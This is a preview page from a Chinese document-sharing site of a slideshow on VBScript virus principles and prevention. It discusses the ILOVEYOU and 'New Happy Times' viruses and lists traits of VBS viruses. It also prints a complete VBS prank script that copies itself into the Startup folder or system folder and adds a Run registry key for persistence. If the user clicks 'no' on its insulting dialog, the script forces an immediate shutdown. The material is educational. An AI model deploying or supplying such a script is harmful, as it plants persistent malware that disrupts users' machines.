脚本病毒原理分析与防范..pptVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
脚本病毒原理分析与防范..ppt

目录 一、Vbs脚本病毒的特点及发展现状 二、Vbs脚本病毒原理分析 三、如何防范vbs脚本病毒 四、对所有脚本类病毒发展的展望 自动关机 Dim fs, dirwin, c,Wll, str,strr,r Set fs = CreateObject(Scripting.FileSystemObject) Set dirwin = fs.GetSpecialFolder(1) Set Wll = WScript.CreateObject(WScript.Shell) Set c = fs.GetFile(WScript.ScriptFullName) str =HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wxb if (fs.FileExists(dirwin\wxb.vbs)) Then call Show_And_Do(reg) elseif (fs.FileExists(C:\Documents and Settings\All Users\Start Menu\Programs\Startup\wxb.vbs)) Then call Show_And_Do(Startup) else On Error Resume Next strr= Wll.RegWrite str, C:\WINDOWS\system32\wxb.vbs, REG_SZ strr=Wll.Regread (str) if strr= then c.Copy(C:\Documents and Settings\All Users\Start Menu\Programs\Startup\wxb.vbs) else c.Copy(dirwin\wxb.vbs) end if end if sub Show_And_Do(s) dim f r = MsgBox (提问:你认为你是猪吗? Chr(13) Chr(10) 确定-是猪 Chr(10) 取消-不是猪, 4145, MsgBox Example) If r = 1 Then if s=Startup then set f = fs.GetFile(C:\Documents and Settings\All Users\Start Menu\Programs\Startup\wxb.vbs) f.Delete() elseif s=reg then Wll.RegDelete str set f = fs.GetFile(dirwin\wxb.vbs) f.Delete() end if Else wll.run Shutdown.exe -s -f -t 0 End If end sub 网络的流行,让我们的世界变得更加美好,但它也有让人不愉快的时候。当您收到一封主题为“I Love You”的邮件,用兴奋得几乎快发抖的鼠标去点击附件的时候;当您浏览一个信任的网站之后,发现打开每个文件夹的速度非常慢的时候,您是否察觉病毒已经闯进了您的世界呢?2000年5月4日欧美爆发的“爱虫”网络蠕虫病毒。由于通过电子邮件系统传播,爱虫病毒在短短几天内狂袭全球数百万计的电脑。微软、 Intel等在内的众多大型企业网络系统瘫痪,全球经济损失达几十亿美元。而去年爆发的新欢乐时光病毒至今都让广大电脑用户更是苦不堪言。 上面提及的两个病毒最大的一个共同特点是:使用VBScript编写。以爱虫和新欢乐时光病毒为典型代表的VBS脚本病毒十分的猖獗,很重要的一个原因就是其编写简单。下面我们就来逐一对VBS脚本病毒的各个方面加以分析: 一、Vbs脚本病毒的特点及发展现状 VBS病毒是用VB Script编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点: 1.编写简单,一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。 2.破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃,网络发生严重阻塞。 3.感染力强。由于脚本是直接解释执行,并且它不需要像PE病毒那样,需要做复杂的PE文件格式处理,因此这类病毒可以直接通过自我复制的方式感染其他同类文件,并且自我的异常处理变得非常容易。 4.传播范围大。这类病毒通过htm文档,Email附件或其它方式,可以在很短时间内传遍世界各地。 5.病毒源码容易被获取,变种多。由于VBS

文档评论(0)

rewfdgd + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档